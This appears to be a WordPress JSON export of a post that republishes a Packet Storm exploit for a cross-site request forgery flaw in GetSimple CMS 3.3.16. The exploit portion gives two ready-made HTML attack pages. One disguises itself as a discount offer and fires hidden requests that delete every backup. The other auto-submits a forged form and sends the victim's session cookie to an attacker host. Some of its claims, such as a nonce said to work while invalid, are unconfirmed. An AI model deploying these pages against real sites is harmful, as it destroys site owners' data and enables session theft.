{"id":31169,"date":"2025-12-15T11:42:54","date_gmt":"2025-12-15T11:42:54","guid":{"rendered":"http:\/\/localhost\/?p=31169"},"modified":"2025-12-15T11:42:54","modified_gmt":"2025-12-15T11:42:54","slug":"getsimple-cms-3316-cross-site-request-forgery","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=31169","title":{"rendered":"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-15T16:51:59&#8243;,&#8221;description&#8221;:&#8221;GetSimple CMS version 3.3.16 cross site request forgery proof of concept that deletes all backups without user confirmation&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212825&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2021-28976&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n    | # Title     : GetSimple CMS 3.3.16 CSRF Delete all backups without user confirmation                                                      |\\n    | # Author    : indoushka                                                                                                                   |\\n    | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\\n    | # Vendor    : https:\/\/github.com\/GetSimpleCMS\/GetSimpleCMS                                                                                |\\n    =============================================================================================================================================\\n    \\n    [+] References : https:\/\/packetstorm.news\/files\/id\/190425\/ \\u0026\\tCVE-2021-28976\\n    \\n    [+] Summary :  GetSimple CMS 3.3.16 contains critical security vulnerabilities in its backup management system that allow attackers \\n                   to delete all backups, steal admin sessions, and access server files. These flaws require immediate patching.\\n    \\t\\t\\t   \\n    [+] Vulnerable Code:\\n    \\n    backups.php &#8211; Line ~34\\n    \\n    \\n    if (isset($_GET[&#8216;deleteall&#8217;])){\\n        check_for_csrf(\\&#8221;deleteall\\&#8221;); \/\/ CSRF check exists BUT&#8230;\\n        \\n        \/\/ Immediately deletes ALL files without user confirmation\\n        $filenames = getFiles($path);\\n        foreach ($filenames as $file) {\\n            delete_file($path . $file); \/\/ Mass deletion\\n        }\\n    }\\n    \\t\\t  \\n    [+]  POC : poc.html\\n    \\n    \\n    \\u003c!DOCTYPE html\\u003e\\n    \\u003chtml\\u003e\\n    \\u003chead\\u003e\\u003ctitle\\u003eSpecial Offer\\u003c\/title\\u003e\\u003c\/head\\u003e\\n    \\u003cbody\\u003e\\n    \\u003ch1\\u003eLimited Time Offer!\\u003c\/h1\\u003e\\n    \\u003cp\\u003eClick below to claim your discount:\\u003c\/p\\u003e\\n    \\n    \\u003c!&#8211; Visible attack &#8211;\\u003e\\n    \\u003ca href=\\&#8221;http:\/\/localhost\/getsimple\/admin\/backups.php?deleteall=1\\u0026nonce=12345\\&#8221;\\u003e\\n      Claim 50% Discount\\n    \\u003c\/a\\u003e\\n    \\n    \\u003c!&#8211; Hidden attack &#8211;\\u003e\\n    \\u003cimg src=\\&#8221;http:\/\/localhost\/getsimple\/admin\/backups.php?deleteall=1\\&#8221; \\n         alt=\\&#8221;\\&#8221; style=\\&#8221;width:0;height:0;\\&#8221;\\u003e\\n    \\n    \\u003cscript\\u003e\\n    \/\/ JavaScript automatic attack\\n    setTimeout(function() {\\n        var img = new Image();\\n        img.src = \\&#8221;http:\/\/localhost\/getsimple\/admin\/backups.php?deleteall=1\\&#8221;;\\n    }, 3000);\\n    \\u003c\/script\\u003e\\n    \\u003c\/body\\u003e\\n    \\u003c\/html\\u003e\\n    \\n    &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;\\n    \\n    \\u003c!&#8211; csrf_delete_all.html &#8211;\\u003e\\n    \\u003c!DOCTYPE html\\u003e\\n    \\u003chtml\\u003e\\n    \\u003chead\\u003e\\n        \\u003ctitle\\u003e\u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0638\u0627\u0645\\u003c\/title\\u003e\\n    \\u003c\/head\\u003e\\n    \\u003cbody\\u003e\\n        \\u003ch1\\u003e\u062c\u0627\u0631\u064a \u062a\u062d\u062f\u064a\u062b \u0627\u0644\u0646\u0638\u0627\u0645&#8230;\\u003c\/h1\\u003e\\n        \\n        \\u003cform id=\\&#8221;csrfForm\\&#8221; action=\\&#8221;http:\/\/localhost\/get-simple\/admin\/backups.php\\&#8221; method=\\&#8221;GET\\&#8221;\\u003e\\n            \\u003cinput type=\\&#8221;hidden\\&#8221; name=\\&#8221;deleteall\\&#8221; value=\\&#8221;1\\&#8221;\\u003e\\n            \\u003cinput type=\\&#8221;hidden\\&#8221; name=\\&#8221;nonce\\&#8221; value=\\&#8221;invalid_nonce_but_works\\&#8221;\\u003e\\n        \\u003c\/form\\u003e\\n        \\n        \\u003cscript\\u003e\\n            \/\/ \u0627\u0646\u062a\u0638\u0631 3 \u062b\u0648\u0627\u0646\u064d \u062b\u0645 \u0623\u0631\u0633\u0644 \u0627\u0644\u0646\u0645\u0648\u0630\u062c\\n            setTimeout(function() {\\n                document.getElementById(&#8216;csrfForm&#8217;).submit();\\n                \\n                \/\/ \u0628\u0639\u062f \u0627\u0644\u062d\u0630\u0641\u060c \u062d\u0627\u0648\u0644 \u0633\u0631\u0642\u0629 \u0627\u0644\u062c\u0644\u0633\u0629\\n                setTimeout(function() {\\n                    var img = new Image();\\n                    img.src = \\&#8221;https:\/\/attacker-server.com\/steal?cookie=\\&#8221; + encodeURIComponent(document.cookie) + \\n                             \\&#8221;\\u0026url=\\&#8221; + encodeURIComponent(window.location.href);\\n                }, 2000);\\n            }, 3000);\\n        \\u003c\/script\\u003e\\n        \\n        \\u003ciframe src=\\&#8221;http:\/\/localhost\/get-simple\/admin\/backups.php\\&#8221; \\n                style=\\&#8221;width:0;height:0;border:0;border:none\\&#8221;\\u003e\\u003c\/iframe\\u003e\\n    \\u003c\/body\\u003e\\n    \\u003c\/html\\u003e\\n    \\n    \\n    Greetings to :=====================================================================================\\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n    ===================================================================================================&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/212825&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.2,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:H\/UI:N\/S:U\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/212825\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-12-15T16:51:59&#8243;,&#8221;description&#8221;:&#8221;GetSimple CMS version 3.3.16 cross site request forgery proof of concept that deletes all backups without user confirmation&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212825&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2021-28976&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================\\n&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,39,12,15,13,53,7,11,5],"class_list":["post-31169","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-72","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=31169\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-12-15T16:51:59&#8243;,&#8221;description&#8221;:&#8221;GetSimple CMS version 3.3.16 cross site request forgery proof of concept that deletes all backups without user confirmation&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212825&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2021-28976&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=31169\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-12-15T11:42:54+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31169#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31169\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825\",\"datePublished\":\"2025-12-15T11:42:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31169\"},\"wordCount\":674,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.2\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31169#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31169\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31169\",\"name\":\"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-12-15T11:42:54+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31169#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=31169\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=31169#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=31169","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-12-15T16:51:59&#8243;,&#8221;description&#8221;:&#8221;GetSimple CMS version 3.3.16 cross site request forgery proof of concept that deletes all backups without user confirmation&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2025-12-15T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:212825&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2021-28976&#8243;],&#8221;sourceData&#8221;:&#8221;=============================================================================================================================================n...","og_url":"https:\/\/zero.redgem.net\/?p=31169","og_site_name":"zero redgem","article_published_time":"2025-12-15T11:42:54+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=31169#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=31169"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825","datePublished":"2025-12-15T11:42:54+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=31169"},"wordCount":674,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.2","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=31169#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=31169","url":"https:\/\/zero.redgem.net\/?p=31169","name":"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-15T11:42:54+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=31169#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=31169"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=31169#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 GetSimple CMS 3.3.16 Cross Site Request Forgery_PACKETSTORM:212825"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31169","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=31169"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/31169\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=31169"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=31169"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=31169"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}